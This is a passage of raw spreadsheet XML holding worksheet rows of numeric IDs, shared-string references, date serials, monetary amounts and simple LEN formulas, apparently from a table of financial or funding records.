      <c r="K1344">
        <f>LEN(I1344)</f>
        <v>77</v>
      </c>
      <c r="L1344">
        <f>LEN(J1344)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1345" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1345">
        <v>21104</v>
      </c>
      <c r="B1345">
        <v>1713</v>
      </c>
      <c r="C1345" t="s">
        <v>2878</v>
      </c>
      <c r="D1345" t="s">
        <v>11141</v>
      </c>
      <c r="E1345">
        <v>16</v>
      </c>
      <c r="F1345" t="s">
        <v>10543</v>
      </c>
      <c r="G1345" s="1">
        <v>44081</v>
      </c>
      <c r="H1345">
        <v>0</v>
      </c>
      <c r="I1345" t="s">
        <v>11143</v>
      </c>
      <c r="K1345">
        <f>LEN(I1345)</f>
        <v>77</v>
      </c>
      <c r="L1345">
        <f>LEN(J1345)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1346" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1346">
        <v>21228</v>
      </c>
      <c r="B1346">
        <v>681</v>
      </c>
      <c r="C1346" t="s">
        <v>1571</v>
      </c>
      <c r="D1346" t="s">
        <v>9439</v>
      </c>
      <c r="E1346">
        <v>11</v>
      </c>
      <c r="F1346" t="s">
        <v>11223</v>
      </c>
      <c r="G1346" s="1">
        <v>44015</v>
      </c>
      <c r="H1346">
        <v>300000</v>
      </c>
      <c r="I1346" t="s">
        <v>11224</v>
      </c>
      <c r="K1346">
        <f>LEN(I1346)</f>
        <v>74</v>
      </c>
      <c r="L1346">
        <f>LEN(J1346)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1347" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1347">
        <v>20850</v>
      </c>
      <c r="B1347">
        <v>538</v>
      </c>
      <c r="C1347" t="s">
        <v>824</v>
      </c>
      <c r="D1347" t="s">
        <v>11032</v>
      </c>
      <c r="E1347">
        <v>11</v>
      </c>
      <c r="F1347" t="s">
        <v>3242</v>
      </c>
      <c r="G1347" s="1">
        <v>44012</v>
      </c>
      <c r="H1347">
        <v>0</v>
      </c>
      <c r="I1347" t="s">
        <v>11037</v>
      </c>
      <c r="K1347">
        <f>LEN(I1347)</f>
        <v>73</v>
      </c>
      <c r="L1347">
        <f>LEN(J1347)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1348" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1348">
        <v>19447</v>
      </c>
      <c r="B1348">
        <v>2573</v>
      </c>
      <c r="C1348" t="s">
        <v>5094</v>
      </c>
      <c r="D1348" t="s">
        <v>10047</v>
      </c>
      <c r="E1348">
        <v>12</v>
      </c>
      <c r="F1348" t="s">
        <v>10050</v>
      </c>
      <c r="G1348" s="1">
        <v>44103</v>
      </c>
      <c r="H1348">
        <v>50000</v>
      </c>
      <c r="I1348" t="s">
        <v>10049</v>
      </c>
      <c r="K1348">
        <f>LEN(I1348)</f>
        <v>69</v>
      </c>
      <c r="L1348">
        <f>LEN(J1348)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1349" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1349">
        <v>19448</v>
      </c>
      <c r="B1349">
        <v>2573</v>
      </c>
      <c r="C1349" t="s">
        <v>5094</v>
      </c>
      <c r="D1349" t="s">
        <v>10047</v>
      </c>
      <c r="E1349">
        <v>12</v>
      </c>
      <c r="F1349" t="s">
        <v>9437</v>
      </c>
      <c r="G1349" s="1">
        <v>44103</v>
      </c>
      <c r="H1349">
        <v>50000</v>
      </c>
      <c r="I1349" t="s">
        <v>10049</v>
      </c>
      <c r="K1349">
        <f>LEN(I1349)</f>
        <v>69</v>
      </c>
      <c r="L1349">
        <f>LEN(J1349)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1350" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1350">
        <v>19451</v>
      </c>
      <c r="B1350">
        <v>2573</v>
      </c>
      <c r="C1350" t="s">
        <v>5094</v>
      </c>
      <c r="D1350" t="s">
        <v>10047</v>
      </c>
      <c r="E1350">
        <v>12</v>
      </c>
      <c r="F1350" t="s">
        <v>8913</v>
      </c>
      <c r="G1350" s="1">
        <v>44103</v>
      </c>
      <c r="H1350">
        <v>50000</v>
      </c>
      <c r="I1350" t="s">
        <v>10049</v>
      </c>
      <c r="K1350">
        <f>LEN(I1350)</f>
        <v>69</v>
      </c>
      <c r="L1350">
        <f>LEN(J1350)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1351" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1351">
        <v>21088</v>
      </c>
      <c r="B1351">
        <v>711</v>
      </c>
      <c r="C1351" t="s">
        <v>1511</v>
      </c>
      <c r="D1351" t="s">
        <v>11126</v>
      </c>
      <c r="E1351">
        <v>23</v>
      </c>
      <c r="F1351" t="s">
        <v>11128</v>
      </c>
      <c r="G1351" s="1">
        <v>44068</v>
      </c>
      <c r="H1351">
        <v>240</v>
      </c>
      <c r="I1351" t="s">
        <v>11129</v>
      </c>
      <c r="K1351">
        <f>LEN(I1351)</f>
        <v>68</v>
      </c>
      <c r="L1351">
        <f>LEN(J1351)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1352" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1352">
        <v>21089</v>
      </c>
      <c r="B1352">
        <v>711</v>
      </c>
      <c r="C1352" t="s">
        <v>1511</v>
      </c>
      <c r="D1352" t="s">
        <v>11126</v>
      </c>
      <c r="E1352">
        <v>23</v>
      </c>
      <c r="F1352" t="s">
        <v>3341</v>
      </c>
      <c r="G1352" s="1">
        <v>44068</v>
      </c>
      <c r="H1352">
        <v>120</v>
      </c>
      <c r="I1352" t="s">
        <v>11129</v>
      </c>
      <c r="K1352">
        <f>LEN(I1352)</f>
        <v>68</v>
      </c>
      <c r="L1352">
        <f>LEN(J1352)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1353" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1353">
        <v>21389</v>
      </c>
      <c r="B1353">
        <v>1125</v>
      </c>
      <c r="C1353" t="s">
        <v>3218</v>
      </c>
      <c r="D1353" t="s">
        <v>11362</v>
      </c>
      <c r="E1353">
        <v>14</v>
      </c>
      <c r="F1353" t="s">
        <v>11363</v>
      </c>
      <c r="G1353" s="1">
        <v>44200</v>
      </c>
      <c r="H1353">
        <v>60000000</v>
      </c>
      <c r="I1353" t="s">
        <v>11364</v>
      </c>
      <c r="K1353">
        <f>LEN(I1353)</f>
        <v>68</v>
      </c>
      <c r="L1353">
        <f>LEN(J1353)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1354" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1354">
        <v>20293</v>
      </c>
      <c r="B1354">
        <v>578</v>
      </c>
      <c r="C1354" t="s">
        <v>871</v>
      </c>
      <c r="D1354" t="s">
        <v>10605</v>
      </c>
      <c r="E1354">
        <v>28</v>
      </c>
      <c r="F1354" t="s">
        <v>10609</v>
      </c>
      <c r="G1354" s="1">
        <v>43959</v>
      </c>
      <c r="H1354">
        <v>70000</v>
      </c>
      <c r="I1354" t="s">
        <v>10610</v>
      </c>
      <c r="K1354">
        <f>LEN(I1354)</f>
        <v>66</v>
      </c>
      <c r="L1354">
        <f>LEN(J1354)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1355" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1355">
        <v>20694</v>
      </c>
      <c r="B1355">
        <v>502</v>
      </c>
      <c r="C1355" t="s">
        <v>914</v>
      </c>
      <c r="D1355" t="s">
        <v>10895</v>
      </c>
      <c r="E1355">
        <v>15</v>
      </c>
      <c r="F1355" t="s">
        <v>10896</v>
      </c>
      <c r="G1355" s="1">
        <v>44046</v>
      </c>
      <c r="H1355">
        <v>600</v>
      </c>
      <c r="I1355" t="s">
        <v>10897</v>
      </c>
      <c r="K1355">
        <f>LEN(I1355)</f>
        <v>65</v>
      </c>
      <c r="L1355">
        <f>LEN(J1355)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1356" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1356">
        <v>20695</v>
      </c>
      <c r="B1356">
        <v>502</v>
      </c>
      <c r="C1356" t="s">
        <v>914</v>
      </c>
      <c r="D1356" t="s">
        <v>10895</v>
      </c>
      <c r="E1356">
        <v>15</v>
      </c>
      <c r="F1356" t="s">
        <v>10898</v>
      </c>
      <c r="G1356" s="1">
        <v>44046</v>
      </c>
      <c r="H1356">
        <v>600</v>
      </c>
      <c r="I1356" t="s">
        <v>10897</v>
      </c>
      <c r="K1356">
        <f>LEN(I1356)</f>
        <v>65</v>
      </c>
      <c r="L1356">
        <f>LEN(J1356)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1357" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1357">
        <v>20603</v>
      </c>
      <c r="B1357">
        <v>935</v>
      </c>
      <c r="C1357" t="s">
        <v>2886</v>
      </c>
      <c r="D1357" t="s">
        <v>10843</v>
      </c>
      <c r="E1357">
        <v>13</v>
      </c>
      <c r="F1357" t="s">
        <v>132</v>
      </c>
      <c r="G1357" s="1">
        <v>44103</v>
      </c>
      <c r="H1357">
        <v>0</v>
      </c>
      <c r="I1357" t="s">
        <v>10844</v>
      </c>
      <c r="K1357">
        <f>LEN(I1357)</f>
        <v>64</v>
      </c>
      <c r="L1357">
        <f>LEN(J1357)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1358" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1358">
        <v>21204</v>
      </c>
      <c r="B1358">
        <v>4776</v>
      </c>
      <c r="C1358" t="s">
        <v>16374</v>
      </c>
      <c r="D1358" t="s">
        <v>16375</v>
      </c>
      <c r="E1358">
        <v>12</v>
      </c>
      <c r="F1358" t="s">
        <v>9676</v>
      </c>
      <c r="G1358" s="1">
        <v>44028</v>
      </c>
      <c r="H1358" s="3" t="s">
        <v>16245</v>
      </c>
      <c r="I1358" t="s">
        <v>11212</v>
      </c>
      <c r="K1358">
        <f>LEN(I1358)</f>
        <v>64</v>
      </c>
      <c r="L1358">
        <f>LEN(J1358)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1359" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1359">
        <v>21205</v>
      </c>
      <c r="B1359">
        <v>4776</v>
      </c>
      <c r="C1359" t="s">
        <v>7120</v>
      </c>
      <c r="D1359" t="s">
        <v>11213</v>
      </c>
      <c r="E1359">
        <v>12</v>
      </c>
      <c r="F1359" t="s">
        <v>3814</v>
      </c>
      <c r="G1359" s="1">
        <v>44032</v>
      </c>
      <c r="H1359">
        <v>21</v>
      </c>
      <c r="I1359" t="s">
        <v>11212</v>
      </c>
      <c r="K1359">
        <f>LEN(I1359)</f>
        <v>64</v>
      </c>
      <c r="L1359">
        <f>LEN(J1359)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1360" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1360">
        <v>21206</v>
      </c>
      <c r="B1360">
        <v>4776</v>
      </c>
      <c r="C1360" t="s">
        <v>7120</v>
      </c>
      <c r="D1360" t="s">
        <v>11213</v>
      </c>
      <c r="E1360">
        <v>12</v>
      </c>
      <c r="F1360" t="s">
        <v>9928</v>
      </c>
      <c r="G1360" s="1">
        <v>44032</v>
      </c>
      <c r="H1360">
        <v>0</v>
      </c>
      <c r="I1360" t="s">
        <v>11212</v>
      </c>
      <c r="K1360">
        <f>LEN(I1360)</f>
        <v>64</v>
      </c>
      <c r="L1360">
        <f>LEN(J1360)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1361" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1361">
        <v>21207</v>
      </c>
      <c r="B1361">
        <v>4776</v>
      </c>
      <c r="C1361" t="s">
        <v>16374</v>
      </c>
      <c r="D1361" t="s">
        <v>16376</v>
      </c>
      <c r="E1361">
        <v>12</v>
      </c>
      <c r="F1361" t="s">
        <v>11214</v>
      </c>
      <c r="G1361" s="1">
        <v>44032</v>
      </c>
      <c r="H1361">
        <v>33282.32</v>
      </c>
      <c r="I1361" t="s">
        <v>11212</v>
      </c>
      <c r="K1361">
        <f>LEN(I1361)</f>
        <v>64</v>
      </c>
      <c r="L1361">
        <f>LEN(J1361)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1362" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1362">
        <v>21208</v>
      </c>
      <c r="B1362">
        <v>4776</v>
      </c>
      <c r="C1362" t="s">
        <v>16374</v>
      </c>
      <c r="D1362" t="s">
        <v>16376</v>
      </c>
      <c r="E1362">
        <v>12</v>
      </c>
      <c r="F1362" t="s">
        <v>11215</v>
      </c>
      <c r="G1362" s="1">
        <v>44032</v>
      </c>
      <c r="H1362" s="3" t="s">
        <v>16246</v>
      </c>
      <c r="I1362" t="s">
        <v>11212</v>
      </c>
      <c r="K1362">
        <f>LEN(I1362)</f>
        <v>64</v>
      </c>
      <c r="L1362">
        <f>LEN(J1362)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1363" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1363">
        <v>21209</v>
      </c>
      <c r="B1363">
        <v>4776</v>
      </c>
      <c r="C1363" t="s">
        <v>16374</v>
      </c>
      <c r="D1363" t="s">
        <v>16376</v>
      </c>
      <c r="E1363">
        <v>12</v>
      </c>
      <c r="F1363" t="s">
        <v>11216</v>
      </c>
      <c r="G1363" s="1">
        <v>44032</v>
      </c>
      <c r="H1363" s="3" t="s">
        <v>16247</v>
      </c>
      <c r="I1363" t="s">
        <v>11212</v>
      </c>
      <c r="K1363">
        <f>LEN(I1363)</f>
        <v>64</v>
      </c>
      <c r="L1363">
        <f>LEN(J1363)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1364" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1364">
        <v>21210</v>
      </c>
      <c r="B1364">
        <v>4776</v>
      </c>
      <c r="C1364" t="s">
        <v>16374</v>
      </c>
      <c r="D1364" t="s">
        <v>16376</v>
      </c>
      <c r="E1364">
        <v>12</v>
      </c>
      <c r="F1364" t="s">
        <v>7296</v>
      </c>
      <c r="G1364" s="1">
        <v>44032</v>
      </c>
      <c r="H1364" s="3" t="s">
        <v>16248</v>
      </c>
      <c r="I1364" t="s">
        <v>11212</v>
      </c>
      <c r="K1364">
        <f>LEN(I1364)</f>
        <v>64</v>
      </c>
      <c r="L1364">
        <f>LEN(J1364)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1365" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1365">
        <v>21211</v>
      </c>
      <c r="B1365">
        <v>4776</v>
      </c>
      <c r="C1365" t="s">
        <v>16374</v>
      </c>
      <c r="D1365" t="s">
        <v>16376</v>
      </c>
      <c r="E1365">
        <v>12</v>
      </c>
      <c r="F1365" t="s">
        <v>9578</v>
      </c>
      <c r="G1365" s="1">
        <v>44033</v>
      </c>
      <c r="H1365">
        <v>224.65</v>
      </c>
      <c r="I1365" t="s">
        <v>11212</v>
      </c>
      <c r="K1365">
        <f>LEN(I1365)</f>
        <v>64</v>
      </c>
      <c r="L1365">
        <f>LEN(J1365)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1366" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1366">
        <v>21212</v>
      </c>
      <c r="B1366">
        <v>4776</v>
      </c>
      <c r="C1366" t="s">
        <v>16374</v>
      </c>
      <c r="D1366" t="s">
        <v>16376</v>
      </c>
      <c r="E1366">
        <v>12</v>
      </c>
      <c r="F1366" t="s">
        <v>9577</v>
      </c>
      <c r="G1366" s="1">
        <v>44032</v>
      </c>
      <c r="H1366">
        <v>1691.98</v>
      </c>
      <c r="I1366" t="s">
        <v>11212</v>
      </c>
      <c r="K1366">
        <f>LEN(I1366)</f>
        <v>64</v>
      </c>
      <c r="L1366">
        <f>LEN(J1366)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1367" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1367">
        <v>21213</v>
      </c>
      <c r="B1367">
        <v>4776</v>
      </c>
      <c r="C1367" t="s">
        <v>7120</v>
      </c>
      <c r="D1367" t="s">
        <v>11213</v>
      </c>
      <c r="E1367">
        <v>12</v>
      </c>
      <c r="F1367" t="s">
        <v>4686</v>
      </c>
      <c r="G1367" s="1">
        <v>44032</v>
      </c>
      <c r="H1367">
        <v>0</v>
      </c>
      <c r="I1367" t="s">
        <v>11212</v>
      </c>
      <c r="K1367">
        <f>LEN(I1367)</f>
        <v>64</v>
      </c>
      <c r="L1367">
        <f>LEN(J1367)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1368" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1368">
        <v>21214</v>
      </c>
      <c r="B1368">
        <v>4776</v>
      </c>
      <c r="C1368" t="s">
        <v>7120</v>
      </c>
      <c r="D1368" t="s">
        <v>11213</v>
      </c>
      <c r="E1368">
        <v>12</v>
      </c>
      <c r="F1368" t="s">
        <v>9561</v>
      </c>
      <c r="G1368" s="1">
        <v>44032</v>
      </c>
      <c r="H1368">
        <v>0</v>
      </c>
      <c r="I1368" t="s">
        <v>11212</v>
      </c>
      <c r="K1368">
        <f>LEN(I1368)</f>
        <v>64</v>
      </c>
      <c r="L1368">
        <f>LEN(J1368)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1369" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1369">
        <v>21215</v>
      </c>
      <c r="B1369">
        <v>4776</v>
      </c>
      <c r="C1369" t="s">
        <v>7120</v>
      </c>
      <c r="D1369" t="s">
        <v>11211</v>
      </c>
      <c r="E1369">
        <v>12</v>
      </c>
      <c r="F1369" t="s">
        <v>1746</v>
      </c>
      <c r="G1369" s="1">
        <v>44028</v>
      </c>
      <c r="H1369">
        <v>0</v>
      </c>
      <c r="I1369" t="s">
        <v>11212</v>
      </c>
      <c r="K1369">
        <f>LEN(I1369)</f>
        <v>64</v>
      </c>
      <c r="L1369">
        <f>LEN(J1369)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1370" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1370">
        <v>21217</v>
      </c>
      <c r="B1370">
        <v>4776</v>
      </c>
      <c r="C1370" t="s">
        <v>7120</v>
      </c>
      <c r="D1370" t="s">
        <v>11211</v>
      </c>
      <c r="E1370">
        <v>12</v>
      </c>
      <c r="F1370" t="s">
        <v>11217</v>
      </c>
      <c r="G1370" s="1">
        <v>44028</v>
      </c>
      <c r="H1370">
        <v>0</v>
      </c>
      <c r="I1370" t="s">
        <v>11212</v>
      </c>
      <c r="K1370">
        <f>LEN(I1370)</f>
        <v>64</v>
      </c>
      <c r="L1370">
        <f>LEN(J1370)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1371" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1371">
        <v>21218</v>
      </c>
      <c r="B1371">
        <v>4776</v>
      </c>
      <c r="C1371" t="s">
        <v>7120</v>
      </c>
      <c r="D1371" t="s">
        <v>11211</v>
      </c>
      <c r="E1371">
        <v>12</v>
      </c>
      <c r="F1371" t="s">
        <v>10208</v>
      </c>
      <c r="G1371" s="1">
        <v>44028</v>
      </c>
      <c r="H1371">
        <v>0</v>
      </c>
      <c r="I1371" t="s">
        <v>11212</v>
      </c>
      <c r="K1371">
        <f>LEN(I1371)</f>
        <v>64</v>
      </c>
      <c r="L1371">
        <f>LEN(J1371)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1372" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1372">
        <v>21219</v>
      </c>
      <c r="B1372">
        <v>4776</v>
      </c>
      <c r="C1372" t="s">
        <v>7120</v>
      </c>
      <c r="D1372" t="s">
        <v>11211</v>
      </c>
      <c r="E1372">
        <v>12</v>
      </c>
      <c r="F1372" t="s">
        <v>9579</v>
      </c>
      <c r="G1372" s="1">
        <v>44028</v>
      </c>
      <c r="H1372">
        <v>0</v>
      </c>
      <c r="I1372" t="s">
        <v>11212</v>
      </c>
      <c r="K1372">
        <f>LEN(I1372)</f>
        <v>64</v>
      </c>
      <c r="L1372">
        <f>LEN(J1372)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1373" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1373">
        <v>21220</v>
      </c>
      <c r="B1373">
        <v>4776</v>
      </c>
      <c r="C1373" t="s">
        <v>7120</v>
      </c>
      <c r="D1373" t="s">
        <v>11211</v>
      </c>
      <c r="E1373">
        <v>12</v>
      </c>
      <c r="F1373" t="s">
        <v>11218</v>
      </c>
      <c r="G1373" s="1">
        <v>44028</v>
      </c>
      <c r="H1373">
        <v>0</v>
      </c>
      <c r="I1373" t="s">
        <v>11212</v>
      </c>
      <c r="K1373">
        <f>LEN(I1373)</f>
        <v>64</v>
      </c>
      <c r="L1373">
        <f>LEN(J1373)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1374" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1374">
        <v>21221</v>
      </c>
      <c r="B1374">
        <v>4776</v>
      </c>
      <c r="C1374" t="s">
        <v>7120</v>
      </c>
      <c r="D1374" t="s">
        <v>11211</v>
      </c>
      <c r="E1374">
        <v>12</v>
      </c>
      <c r="F1374" t="s">
        <v>9460</v>
      </c>
      <c r="G1374" s="1">
        <v>44028</v>
      </c>
      <c r="H1374">
        <v>0</v>
      </c>
      <c r="I1374" t="s">
        <v>11212</v>
      </c>
      <c r="K1374">
        <f>LEN(I1374)</f>
        <v>64</v>
      </c>
      <c r="L1374">
        <f>LEN(J1374)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1375" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1375">
        <v>20605</v>
      </c>
      <c r="B1375">
        <v>935</v>
      </c>
      <c r="C1375" t="s">
        <v>2886</v>
      </c>
      <c r="D1375" t="s">
        <v>10843</v>
      </c>
      <c r="E1375">
        <v>13</v>
      </c>
      <c r="F1375" t="s">
        <v>10846</v>
      </c>
      <c r="G1375" s="1">
        <v>44103</v>
      </c>
      <c r="H1375">
        <v>0</v>
      </c>
      <c r="I1375" t="s">
        <v>10847</v>
      </c>
      <c r="K1375">
        <f>LEN(I1375)</f>
        <v>63</v>
      </c>
      <c r="L1375">
        <f>LEN(J1375)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1376" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1376">
        <v>20565</v>
      </c>
      <c r="B1376">
        <v>1714</v>
      </c>
      <c r="C1376" t="s">
        <v>2975</v>
      </c>
      <c r="D1376" t="s">
        <v>10811</v>
      </c>
      <c r="E1376">
        <v>13</v>
      </c>
      <c r="F1376" t="s">
        <v>7514</v>
      </c>
      <c r="G1376" s="1">
        <v>44186</v>
      </c>
      <c r="H1376">
        <v>1200</v>
      </c>
      <c r="I1376" t="s">
        <v>10815</v>
      </c>
      <c r="K1376">
        <f>LEN(I1376)</f>
        <v>61</v>
      </c>
      <c r="L1376">
        <f>LEN(J1376)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1377" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1377">
        <v>20291</v>
      </c>
      <c r="B1377">
        <v>578</v>
      </c>
      <c r="C1377" t="s">
        <v>871</v>
      </c>
      <c r="D1377" t="s">
        <v>10605</v>
      </c>
      <c r="E1377">
        <v>28</v>
      </c>
      <c r="F1377" t="s">
        <v>1746</v>
      </c>
      <c r="G1377" s="1">
        <v>43959</v>
      </c>
      <c r="H1377">
        <v>50000</v>
      </c>
      <c r="I1377" t="s">
        <v>10607</v>
      </c>
      <c r="K1377">
        <f>LEN(I1377)</f>
        <v>60</v>
      </c>
      <c r="L1377">
        <f>LEN(J1377)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1378" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1378">
        <v>20292</v>
      </c>
      <c r="B1378">
        <v>578</v>
      </c>
      <c r="C1378" t="s">
        <v>871</v>
      </c>
      <c r="D1378" t="s">
        <v>10605</v>
      </c>
      <c r="E1378">
        <v>28</v>
      </c>
      <c r="F1378" t="s">
        <v>10608</v>
      </c>
      <c r="G1378" s="1">
        <v>43959</v>
      </c>
      <c r="H1378">
        <v>60000</v>
      </c>
      <c r="I1378" t="s">
        <v>10607</v>
      </c>
      <c r="K1378">
        <f>LEN(I1378)</f>
        <v>60</v>
      </c>
      <c r="L1378">
        <f>LEN(J1378)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1379" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1379">
        <v>21390</v>
      </c>
      <c r="B1379">
        <v>528</v>
      </c>
      <c r="C1379" t="s">
        <v>1401</v>
      </c>
      <c r="D1379" t="s">
        <v>11365</v>
      </c>
      <c r="E1379">
        <v>23</v>
      </c>
      <c r="F1379" t="s">
        <v>1403</v>
      </c>
      <c r="G1379" s="1">
        <v>44071</v>
      </c>
      <c r="H1379">
        <v>2400</v>
      </c>
      <c r="I1379" t="s">
        <v>11366</v>
      </c>
      <c r="K1379">
        <f>LEN(I1379)</f>
        <v>60</v>
      </c>
      <c r="L1379">
        <f>LEN(J1379)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1380" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1380">
        <v>20441</v>
      </c>
      <c r="B1380">
        <v>2656</v>
      </c>
      <c r="C1380" t="s">
        <v>5748</v>
      </c>
      <c r="D1380" t="s">
        <v>10717</v>
      </c>
      <c r="E1380">
        <v>13</v>
      </c>
      <c r="F1380" t="s">
        <v>10718</v>
      </c>
      <c r="G1380" s="1">
        <v>44155</v>
      </c>
      <c r="H1380">
        <v>420000</v>
      </c>
      <c r="I1380" t="s">
        <v>10719</v>
      </c>
      <c r="K1380">
        <f>LEN(I1380)</f>
        <v>59</v>
      </c>
      <c r="L1380">
        <f>LEN(J1380)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1381" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1381">
        <v>21336</v>
      </c>
      <c r="B1381">
        <v>4798</v>
      </c>
      <c r="C1381" t="s">
        <v>7183</v>
      </c>
      <c r="D1381" t="s">
        <v>11310</v>
      </c>
      <c r="E1381">
        <v>11</v>
      </c>
      <c r="F1381" t="s">
        <v>7296</v>
      </c>
      <c r="G1381" s="1">
        <v>44034</v>
      </c>
      <c r="H1381">
        <v>1000</v>
      </c>
      <c r="I1381" t="s">
        <v>11319</v>
      </c>
      <c r="K1381">
        <f>LEN(I1381)</f>
        <v>59</v>
      </c>
      <c r="L1381">
        <f>LEN(J1381)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1382" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1382">
        <v>20948</v>
      </c>
      <c r="B1382">
        <v>2335</v>
      </c>
      <c r="C1382" t="s">
        <v>6078</v>
      </c>
      <c r="D1382" t="s">
        <v>11069</v>
      </c>
      <c r="E1382">
        <v>12</v>
      </c>
      <c r="F1382" t="s">
        <v>11070</v>
      </c>
      <c r="G1382" s="1">
        <v>44046</v>
      </c>
      <c r="H1382">
        <v>350</v>
      </c>
      <c r="I1382" t="s">
        <v>11071</v>
      </c>
      <c r="K1382">
        <f>LEN(I1382)</f>
        <v>58</v>
      </c>
      <c r="L1382">
        <f>LEN(J1382)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1383" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1383">
        <v>20949</v>
      </c>
      <c r="B1383">
        <v>2335</v>
      </c>
      <c r="C1383" t="s">
        <v>6078</v>
      </c>
      <c r="D1383" t="s">
        <v>11069</v>
      </c>
      <c r="E1383">
        <v>12</v>
      </c>
      <c r="F1383" t="s">
        <v>11072</v>
      </c>
      <c r="G1383" s="1">
        <v>44046</v>
      </c>
      <c r="H1383">
        <v>350</v>
      </c>
      <c r="I1383" t="s">
        <v>11071</v>
      </c>
      <c r="K1383">
        <f>LEN(I1383)</f>
        <v>58</v>
      </c>
      <c r="L1383">
        <f>LEN(J1383)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1384" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1384">
        <v>20580</v>
      </c>
      <c r="B1384">
        <v>2761</v>
      </c>
      <c r="C1384" t="s">
        <v>6953</v>
      </c>
      <c r="D1384" t="s">
        <v>10828</v>
      </c>
      <c r="E1384">
        <v>13</v>
      </c>
      <c r="F1384" t="s">
        <v>9648</v>
      </c>
      <c r="G1384" s="1">
        <v>43998</v>
      </c>
      <c r="H1384">
        <v>1000</v>
      </c>
      <c r="I1384" t="s">
        <v>10829</v>
      </c>
      <c r="K1384">
        <f>LEN(I1384)</f>
        <v>57</v>
      </c>
      <c r="L1384">
        <f>LEN(J1384)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1385" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1385">
        <v>20581</v>
      </c>
      <c r="B1385">
        <v>2761</v>
      </c>
      <c r="C1385" t="s">
        <v>6953</v>
      </c>
      <c r="D1385" t="s">
        <v>10828</v>
      </c>
      <c r="E1385">
        <v>13</v>
      </c>
      <c r="F1385" t="s">
        <v>10830</v>
      </c>
      <c r="G1385" s="1">
        <v>43998</v>
      </c>
      <c r="H1385">
        <v>1000</v>
      </c>
      <c r="I1385" t="s">
        <v>10829</v>
      </c>
      <c r="K1385">
        <f>LEN(I1385)</f>
        <v>57</v>
      </c>
      <c r="L1385">
        <f>LEN(J1385)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1386" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1386">
        <v>20582</v>
      </c>
      <c r="B1386">
        <v>2761</v>
      </c>
      <c r="C1386" t="s">
        <v>6953</v>
      </c>
      <c r="D1386" t="s">
        <v>10828</v>
      </c>
      <c r="E1386">
